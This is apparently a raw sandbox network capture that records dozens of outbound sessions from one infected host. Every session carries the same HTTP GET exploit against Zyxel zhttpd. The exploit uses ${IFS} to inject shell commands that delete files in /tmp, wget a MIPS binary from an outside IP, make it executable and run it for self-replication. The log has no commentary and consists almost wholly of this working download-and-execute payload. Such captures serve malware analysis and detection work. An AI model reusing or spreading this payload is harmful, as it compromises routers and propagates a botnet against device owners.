                                      Jan 14, 2024 15:50:31.952184916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      572192.168.2.144361488.10.151.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952231884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      573192.168.2.1438032126.223.14.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952275038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      574192.168.2.1438956161.114.252.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952306032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      575192.168.2.1448844160.131.107.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952342033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      576192.168.2.144922813.236.134.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952383995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      577192.168.2.1458508106.225.226.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952438116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      578192.168.2.1443430144.91.57.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952461004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      579192.168.2.1439194131.128.141.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952493906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      580192.168.2.145169058.238.140.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952534914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      581192.168.2.144541844.38.136.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952562094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      582192.168.2.144884434.209.123.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952600002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      583192.168.2.144897425.189.58.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952653885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      584192.168.2.145492460.34.105.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952697039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      585192.168.2.1450410140.90.192.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952740908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      586192.168.2.1457276174.218.78.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952780008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      587192.168.2.1456724116.186.55.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952810049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      588192.168.2.144568235.229.140.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952856064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      589192.168.2.1451930101.169.25.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952892065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      590192.168.2.143875052.57.226.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952945948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      591192.168.2.144320414.160.238.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.952987909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      592192.168.2.1444602194.211.184.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953012943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      593192.168.2.1458856183.153.15.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953079939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      594192.168.2.1444364126.229.124.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953104973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      595192.168.2.143384898.58.143.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953167915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      596192.168.2.1456998164.131.194.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953197956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      597192.168.2.1450360118.39.240.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953239918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      598192.168.2.1456696170.35.4.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953283072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      599192.168.2.1452380113.134.191.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953319073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      600192.168.2.145959069.158.103.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953361034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      601192.168.2.1436920109.97.20.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953396082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      602192.168.2.1438368190.33.231.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953438997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      603192.168.2.1450668187.112.0.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953476906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      604192.168.2.1455742120.232.230.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953517914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      605192.168.2.1449620169.98.37.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953572035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      606192.168.2.144648259.251.8.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953597069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      607192.168.2.1452306216.255.83.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953628063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      608192.168.2.1442830143.118.21.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953675985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      609192.168.2.144173897.210.188.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953704119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      610192.168.2.1457852126.117.19.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953768969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      611192.168.2.1457008180.62.220.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953804016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      612192.168.2.1456108159.207.30.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953836918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      613192.168.2.145350063.125.101.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953885078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      614192.168.2.1437916177.28.12.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953916073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      615192.168.2.1454284109.212.216.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953963041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      616192.168.2.1441148170.124.114.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.953999043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      617192.168.2.1446142191.167.97.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954051971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      618192.168.2.1441252216.60.45.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954075098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      619192.168.2.145078871.99.147.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954137087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      620192.168.2.144628827.44.156.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954173088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      621192.168.2.146062013.162.118.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954204082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      622192.168.2.1447038184.12.127.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954241991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      623192.168.2.1439476219.100.84.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954293966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      624192.168.2.145474463.98.152.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954317093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      625192.168.2.1452478151.182.89.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954372883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      626192.168.2.143897289.157.13.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954411983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      627192.168.2.1441414152.217.242.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954441071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      628192.168.2.1460314111.145.196.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954502106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      629192.168.2.1445798185.210.161.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954540968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      630192.168.2.145793850.76.219.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954583883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      631192.168.2.1456350173.229.173.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954616070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      632192.168.2.1452620175.94.102.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954643011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      633192.168.2.1442460118.137.247.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954693079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      634192.168.2.144151268.70.89.209443
                                      TimestampBytes transferredDirectionData
